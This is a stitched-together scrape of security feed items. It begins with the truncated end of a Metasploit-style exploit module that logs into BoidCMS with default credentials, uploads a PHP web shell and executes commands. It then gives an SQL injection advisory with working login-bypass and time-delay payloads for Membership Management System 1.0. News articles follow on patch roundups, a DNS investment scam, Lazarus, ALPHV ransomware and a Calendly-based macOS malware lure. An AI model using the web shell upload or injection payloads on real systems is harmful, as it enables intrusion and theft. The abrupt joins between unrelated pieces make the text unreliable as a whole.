ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'The path', '']),      OptString.new('CMS_USERNAME', [true, 'Username', 'admin']),      OptString.new('CMS_PASSWORD', [true, 'Password', 'password']),      OptString.new('PHP_FILENAME', [true, 'The name for the php file to upload', "#{Rex::Text.rand_text_alphanumeric(5..11)}.php"])    ])    @token = nil    @shell_filename = nil  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    if res && res.code == 200      title = res.get_html_document.xpath('//title').first.to_s      return Exploit::CheckCode::Detected('Detected BoidCMS, but the version is unknown.') if title.include?('BoidCMS')    end    return Exploit::CheckCode::Safe('Unable to retrieve BoidCMS title page')  end  def extract_token(res)    token = nil    if res && res.code == 200      token = res.get_html_document.xpath("//input[@name='token']/@value").first    end    token  end  def cms_token    # initial login    return @token unless @token.nil?    vprint_status('Getting Token')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'keep_cookies' => true,      'method' => 'GET'    )    @token = extract_token(res)  end  def cms_login?(login_token)    vprint_status('Logging into CMS')    cms_password = datastore['CMS_PASSWORD']    cms_username = datastore['CMS_USERNAME']    vars_form_data =      [        {          'name' => 'username',          'data' => cms_username        },        {          'name' => 'password',          'data' => cms_password        },        {          'name' => 'login',          'data' => 'Login'        },        {          'name' => 'token',          'data' => login_token.to_s        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def upload_php?(login_token, shell_filename)    vprint_status("Uploading PHP file #{shell_filename}")    vars_form_data =      [        {          'name' => 'file',          'data' => 'GIF89a;\n<?php system($_GET["cmd"]) ?>',          'filename' => shell_filename        },        {          'name' => 'token',          'data' => login_token.to_s        },        {          'name' => 'upload',          'data' => 'Upload'        }      ]    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin'),      'method' => 'POST',      'keep_cookies' => true,      'vars_get' => {        'page' => 'media'      },      'vars_form_data' => vars_form_data    )    res && res.code == 302  end  def launch_payload(shell_filename, payload_cmd)    # send the command to the php page    vprint_status('launching Payload')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, "/media/#{shell_filename}"),      'method' => 'GET',      'keep_cookies' => true,      'vars_get' =>        {          'cmd' => payload_cmd        }    )  end  def exploit    @shell_filename = datastore['PHP_FILENAME']    login_token = cms_token    fail_with(Failure::UnexpectedReply, 'Failed to retrieve token for login') if login_token.nil?    fail_with(Failure::UnexpectedReply, 'Failed to log in') unless cms_login?(login_token)    if upload_php?(login_token, @shell_filename)      register_file_for_cleanup @shell_filename      launch_payload(@shell_filename, payload.encoded)    else      fail_with(Failure::UnexpectedReply, 'Failed to upload php files')    end  endend

BoidCMS 2.0.0 Command Injection

Membership Management System version 1.0 suffers from a remote SQL injection vulnerability.

    - Title: Membership Management System - SQL injection- Application: Hospital Management System- Date: 01.03.2024- Bugs: SQL injection- Exploit Author: SoSPiro- Vendor Homepage: https://codeastro.com/author/nbadmin/- Software Link: https://codeastro.com/membership-management-system-in-php-with-source-code/- Version: 1.0- Tested on: Windows 10 64 bit Wampserver### Vulnerability Description:The provided payload in the POST request indicates a potential SQL injection vulnerability. Specifically, the manipulation within the email and password parameters suggests an attempt to influence the SQL query directly, presenting a risk for exploiting security vulnerabilities.### SQL Injection:This manipulated submission aims to affect the SQL query by incorporating user input. For instance, the use of **sleep(5)** introduces a time-delay technique, indicative of a potential resource-consuming attack vector by malevolent actors.### Proof of Concept (PoC):Below is an example payload illustrating the SQL injection vulnerability:```email=test@123.asd' + (SELECT * FROM (SELECT (SLEEP(5)))a) +'&password=admin' or '1'='1'&login=```In this example, the **sleep(5)** function is employed to induce a time delay, followed by the use of or **'1'='1'** in the password control section, aiming to always evaluate as true.- Request Response[PoC FoTo](https://gcdnb.pbrd.co/images/9k8xy4YRomp3.png?o=1)### Vulnerable Code Section:```php$email = $_POST['email'];$password = $_POST['password'];$hashed_password = md5($password);$sql = "SELECT * FROM users WHERE email = '$email' AND password = '$hashed_password'";```The provided PHP code section exacerbates the SQL injection risk by directly incorporating user input into the SQL query. To mitigate this vulnerability, the use of parameterized queries or prepared statements is recommended.## Reproduce: https://sospiro014.github.io/Membership-Management-System-SQL-injection

Membership Management System 1.0 SQL Injection

Plus: Mozilla patches 12 flaws in Firefox, Zoom fixes seven vulnerabilities, and more critical updates from February.

CVE-2024-1553 and CVE-2024-1557 are memory-safety bugs rated as having a high severity. “Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code,” Mozilla researchers said.

Zoom

Video conferencing giant Zoom has issued fixes for seven flaws in its software, one of which has a CVSS score of 9.6. CVE-2024-24691 is an improper-input-validation bug in Zoom Desktop Client for Windows, Zoom VDI Client for Windows, and Zoom Meeting SDK for Windows. If exploited, the issue may allow an unauthenticated attacker to escalate their privileges via network access, Zoom said in a security bulletin.

Another notable flaw is CVE-2024-24697, an untrusted-search-path issue in some Zoom 32 bit Windows clients that could allow an authenticated user with local access to escalate their privileges.

Ivanti

In January, Ivanti warned that attackers were targeting two unpatched vulnerabilities in its Connect Secure and Policy Secure products, tracked as CVE-2023-46805 and CVE-2024-21887. With a CVSS score of 8.2 the first authentication-bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks.

With a CVSS score of 9.1, the second command injection vulnerability in web components of Ivanti Connect Secure and Ivanti Policy Secure allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. This vulnerability can be exploited over the internet.

At the end of the month, the firm alerted companies to another two serious flaws, one of which was being exploited in attacks. The exploited issue is a server-side request forgery bug in the SAML component tracked as CVE-2024-21893. Meanwhile, CVE-2024-21888 is a privilege-escalation vulnerability.

Patches were available by February 1, but the issues were deemed so serious that the US Cybersecurity and Infrastructure Security Agency (CISA) advised disconnecting all Ivanti products by February 2.

On February 8, Ivanti released a patch for yet another issue tracked as CVE-2024-22024, which prompted another CISA warning.

Fortinet

Fortinet has issued a patch for a critical issue with a CVSS score of 9.6, which it says is already being used in attacks. Tracked as CVE-2024-21762, the code-execution flaw impacts FortiOS versions 6.0, 6.2, 6.4, 7.0, 7.2 and 7.4. The out-of-bounds write vulnerability can be used for arbitrary code execution using specially crafted HTTP requests, Fortinet said.

It came just days after the firm released a patch for two issues in its FortiSIEM products, CVE-2024-23108 and CVE-2024-23109, rated as critical with a CVSS score of 9.7. The flaw in FortiSIEM Supervisor could allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests, Fortinet said in an advisory.

Cisco

Cisco has listed multiple vulnerabilities in its Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery attacks.

Tracked as CVE-2024-20252 and CVE-2024-20254, two vulnerabilities in the API of Cisco Expressway Series devices have been given a CVSS score of 9.6. “An attacker could exploit these vulnerabilities by persuading a user of the API to follow a crafted link,” Cisco said. “A successful exploit could allow the attacker to perform arbitrary actions with the privilege level of the affected user.”

SAP

Enterprise software firm SAP has released 13 security updates as part of its SAP Security Patch Day. CVE-2024-22131 is a code-injection vulnerability in SAP ABA with a CVSS score of 9.1.

CVE-2024-22126 is a cross-site scripting vulnerability in NetWeaver AS Java listed as having a high impact, with a CVSS score of 8.8. “Incoming URL parameters are insufficiently validated and improperly encoded before including them into redirect URLs,” security firm Onapsis said. “This can result in a cross-site scripting vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.”

Here Are the Google and Microsoft Security Updates You Need Right Now

By Deeba Ahmed
The scammers creates fake investment platforms using popular companies like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds.
This is a post from HackRead.com Read the original post: Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

Infoblox cybersecurity researchers are warning users about a fraudulent scheme launched by a DNS threat actor Savvy Seahorse, which uses Facebook advertisements to trick users into fraudulent investment platforms and transfers deposits to Russian-state-owned banks.

California-based IT automation and security company Infoblox has discovered a relatively new DNS threat actor called “Savvy Seahorse.” According to the company’s report, the actor creates fake investment platforms using popular icons like Tesla, Meta, and Imperial Oil and lures unsuspecting users into depositing funds. 

Savvy Seahorse prefers using Facebook ads to trick users into trusting fake investment platforms and transfers deposits to Russian-state-owned banks. Savvy Seahorse employs advanced techniques like fake ChatGPT and WhatsApp bots to lure users into high-return investment scams, which are the costliest category of threat reported to the FBI’s Internet Crime Complaint Center.

ChatGPT and WhatsApp bots engage users through automated responses for high-return investment opportunities. These campaigns target users in various countries, including Russian, Polish, Italian, German, Czech, Turkish, French, Spanish, and English speakers but interestingly users in Ukraine are protected. 

Through DNS canonical name (CNAME) records, the actor creates a traffic distribution system (TDS) for conducting sophisticated financial scams, controlling access to content and updating the IP addresses of malicious campaigns. This also helps them evade detection by the security industry. It is worth noting that Savvy Seahorse, active since 2021, is the first publicly reported threat actor abusing DNS CNAME records for sophisticated scam campaigns.

In a blog post, Infoblox researchers have identified several red flags associated with the Savvy Seahorse scam. These include short-lived campaigns (active for only 5-10 days), using a phased deployment system, frequent changes in IP addresses (to complicate/block tracking of malicious infrastructure), and the use of wildcard DNS entries.

These entries entail creating numerous subdomains, potentially confusing passive DNS analysis. These characteristics make it difficult to track and block malicious infrastructure. Victims’ data is sent to a secondary HTTP-based TDS server for validation and geofencing.

Around 4.2k base domains with CNAME records are used by Savvy Seahorse to host campaigns, Infoblox researchers confirmed. The attackers create subdomains for each SLD using a domain generation algorithm, using pseudo-random hostnames. Registration forms are used to gather victim information, and after validating it, they are redirected to the fake trading platform. The actor monitors users to prevent security threats.

The scam poses potential risks to individuals, including financial loss, data theft, and malware infection. Users who invest in the fake platform may lose their funds, while the scammers may steal personal and financial information.

Therefore, consumers must be vigilant when trusting unverified sources for making deposits. Remember that the US cumulatively lost over $4.6 billion in 2023 over investment scams.

1.  **WhatsApp Pink is malware spreading through group chats**
2.  **Thousands of Dark Web Posts Expose ChatGPT Abuse Plans**
3.  **China Arrests 4 Who Weaponized ChatGPT for Ransomware Attacks**
4.  **Fake Telegram, WhatsApp clones aim at crypto on Android, Windows**
5.  **SpyNote Android Spyware Poses as Legit Crypto Wallets, Steals Funds**

Savvy Seahorse Using Fake ChatGPT, Facebook Ads in DNS Investment Scam

The notorious Lazarus Group actors exploited a recently patched privilege escalation flaw in the Windows Kernel as a zero-day to obtain kernel-level access and disable security software on compromised hosts.
The vulnerability in question is CVE-2024-21338 (CVSS score: 7.8), which can permit an attacker to gain SYSTEM privileges. It was resolved by Microsoft earlier this month as part

Lazarus Hackers Exploited Windows Kernel Flaw as Zero-Day in Recent Attacks

CISA, FBI and HHS are warning about the ALPHV/ Blackcat ransomware group targeting the healthcare industry.

In an updated #StopRansomware security advisory, the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the Department of Health and Human Services (HHS) has warned the healthcare industry about the danger of the ALPHV ransomware group, also known as Blackcat. According to the advisory:

> Since mid-December 2023, of the nearly 70 leaked victims, the healthcare sector has been the most commonly victimized.

We have reported in the past that ransomware groups show absolutely no respect to previous promises to leave the healthcare sector alone. This is not a new phenomenon, but ALPHV focusing on healthcare specifically is a relatively new one.

On the grapevine you can hear that ALPHV asked their affiliates to focus on this industry as a kind of payback for the disruptions to their infrastructure in December last year by law enforcement.

The recent attack on Change Healthcare has been reportedly caused by ALPHV, but we don’t feel it’s right to say that they didn’t attack healthcare way before the said disruption.

The ALPHV leak site home page. Four of the last nine victims were in healthcare

And unfortunately ALPHV is not the only one. In a new low, the attack on Lurie Children’s Hospital has been claimed by the Rhysida ransomware group.

ALPHV is a Ransomware-as-a-Service (RaaS) group, meaning that its ransomware is made available to criminal affiliates using a software-as-a-service (SaaS) business model. ALPHV was ranked second in the list of most active big game ransomware groups of 2023.

The ten most active big game ransomware groups in 2023, by known attacks

The ten most active big game ransomware groups in 2023, by known attacks

The ten most active big game ransomware groups in 2023, by known attacks

According to the advisory, ALPHV’s affiliates use advanced social engineering techniques and open source research on a company to gain initial access. They pose as company IT and/or helpdesk staff and use phone calls or SMS messages to obtain credentials from employees to access the target network. After the initial breach they deploy remote access software such as AnyDesk, Mega sync, and Splashtop to prepare the theft of data from the network.

From the initial access they use various other legitimate, living off the land (LOTL), tools to further their access. Once the data has been safely moved to their Dropbox or Mega accounts, the ransomware is deployed to encrypt machines in the network. The latest ALPHV Blackcat update has the capability to encrypt both Windows and Linux devices, as well as VMWare instances.

It is unclear how ALPHV would stimulate attacks on healthcare institutions among its affiliates. We do understand that some of the data found during these attacks is very valuable on the underground market.

Having seen how devastating attacks on healthcare can be, we would encourage every cybercriminal involved to waive their right to be treated in any healthcare facility. Or, at least, try and realize the damage they are doing and the potential impact on people’s health.

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

 ALPHV is singling out healthcare sector, say FBI and CISA 

Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s account at Calendly, a popular free calendar application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.

Malicious hackers are targeting people in the cryptocurrency space in attacks that start with a link added to the target’s calendar at **Calendly**, a popular application for scheduling appointments and meetings. The attackers impersonate established cryptocurrency investors and ask to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on **macOS** systems.

KrebsOnSecurity recently heard from a reader who works at a startup that is seeking investment for building a new blockchain platform for the Web. The reader spoke on condition that their name not be used in this story, so for the sake of simplicity we’ll call him **Doug**.

Being in the cryptocurrency scene, Doug is also active on the instant messenger platform **Telegram**. Earlier this month, Doug was approached by someone on Telegram whose profile name, image and description said they were **Ian Lee**, from **Signum Capital**, a well-established investment firm based in Singapore. The profile also linked to Mr. Lee’s Twitter/X account, which features the same profile image.

The investor expressed interest in financially supporting Doug’s startup, and asked if Doug could find time for a video call to discuss investment prospects. Sure, Doug said, here’s my Calendly profile, book a time and we’ll do it then.

When the day and time of the scheduled meeting with Mr. Lee arrived, Doug clicked the meeting link in his calendar but nothing happened. Doug then messaged the Mr. Lee account on Telegram, who said there was some kind of technology issue with the video platform, and that their IT people suggested using a different meeting link.

Doug clicked the new link, but instead of opening up a videoconference app, a message appeared on his Mac saying the video service was experiencing technical difficulties.

“Some of our users are facing issues with our service,” the message read. “We are actively working on fixing these problems. Please refer to this script as a temporary solution.”

Doug said he ran the script, but nothing appeared to happen after that, and the videoconference application still wouldn’t start. Mr. Lee apologized for the inconvenience and said they would have to reschedule their meeting, but he never responded to any of Doug’s follow-up messages.

It didn’t dawn on Doug until days later that the missed meeting with Mr. Lee might have been a malware attack. Going back to his Telegram client to revisit the conversation, Doug discovered his potential investor had deleted the meeting link and other bits of conversation from their shared chat history.

In a post to its Twitter/X account last month, **Signum Capital** warned that a fake profile pretending to be their employee Mr. Lee was trying to scam people on Telegram.

The file that Doug ran is a simple Apple Script (file extension “.scpt”) that downloads and executes a malicious trojan made to run on macOS systems. Unfortunately for us, Doug freaked out after deciding he’d been tricked — backing up his important documents, changing his passwords, and then reinstalling macOS on his computer. While this a perfectly sane response, it means we don’t have the actual malware that was pushed to his Mac by the script.

But Doug does still have a copy of the malicious script that was downloaded from clicking the meeting link (the online host serving that link is now offline). A search in Google for a string of text from that script turns up a December 2023 blog post from cryptocurrency security firm **SlowMist** about phishing attacks on Telegram from North Korean state-sponsored hackers.

“When the project team clicks the link, they encounter a region access restriction,” SlowMist wrote. “At this point, the North Korean hackers coax the team into downloading and running a ‘location-modifying’ malicious script. Once the project team complies, their computer comes under the control of the hackers, leading to the theft of funds.”

Image: SlowMist.

SlowMist says the North Korean phishing scams used the “Add Custom Link” feature of the Calendly meeting scheduling system on event pages to insert malicious links and initiate phishing attacks.

“Since Calendly integrates well with the daily work routines of most project teams, these malicious links do not easily raise suspicion,” the blog post explains. “Consequently, the project teams may inadvertently click on these malicious links, download, and execute malicious code.”

SlowMist said the malware downloaded by the malicious link in their case comes from a North Korean hacking group dubbed “**BlueNoroff**, which **Kaspersky Labs** says is a subgroup of the **Lazarus** hacking group.

“A financially motivated threat actor closely connected with Lazarus that targets banks, casinos, fin-tech companies, POST software and cryptocurrency businesses, and ATMs,” Kaspersky wrote of BlueNoroff in Dec. 2023.

The North Korean regime is known to use stolen cryptocurrencies to fund its military and other state projects. A recent report from **Recorded Future** finds the Lazarus Group _has stolen approximately $3 billion in cryptocurrency over the past six years_.

While there is still far more malware out there today targeting **Microsoft Windows** PCs, the prevalence of information-stealing trojans aimed at macOS users is growing at a steady clip. MacOS computers include **X-Protect**, Apple’s built-in antivirus technology. But experts say attackers are constantly changing the appearance and behavior of their malware to evade X-Protect.

“Recent updates to macOS’s XProtect signature database indicate that Apple are aware of the problem, but early 2024 has already seen a number of stealer families evade known signatures,” security firm **SentinelOne** wrote in January.

According to **Chris Ueland** from the threat hunting platform Hunt.io, the Internet address of the fake meeting website Doug was tricked into visiting (104.168.163,149) hosts or very recently hosted about 75 different domain names, many of which invoke words associated with videoconferencing or cryptocurrency. Those domains indicate this North Korean hacking group is hiding behind a number of phony crypto firms, like the six-month-old website for **Cryptowave Capital** (cryptowave\[.\]capital).

The increasing frequency of new Mac malware is a good reminder that Mac users should not depend on security software and tools to flag malicious files, which are frequently bundled with or disguised as legitimate software.

As KrebsOnSecurity has advised Windows users for years, a good rule of safety to live by is this: _If you didn’t go looking for it, don’t install it._ Following this mantra heads off a great deal of malware attacks, regardless of the platform used. When you do decide to install a piece of software, make sure you are downloading it from the original source, and then keep it updated with any new security fixes.

On that last front, I’ve found it’s a good idea not to wait until the last minute to configure my system before joining a scheduled videoconference call. Even if the call uses software that is already on my computer, it is often the case that software updates are required before the program can be used, and I’m one of those weird people who likes to review any changes to the software maker’s privacy policies or user agreements _before_ choosing to install updates.

Most of all, verify new contacts from strangers before accepting anything from them. In this case, had Doug simply messaged Mr. Lee’s real account on Twitter/X or contacted Signum Capital directly, he would discovered that the real Mr. Lee never asked for a meeting.

If you’re approached in a similar scheme, the response from the would-be victim documented in the SlowMist blog post is probably the best.

Image: SlowMist.

Tag

#windows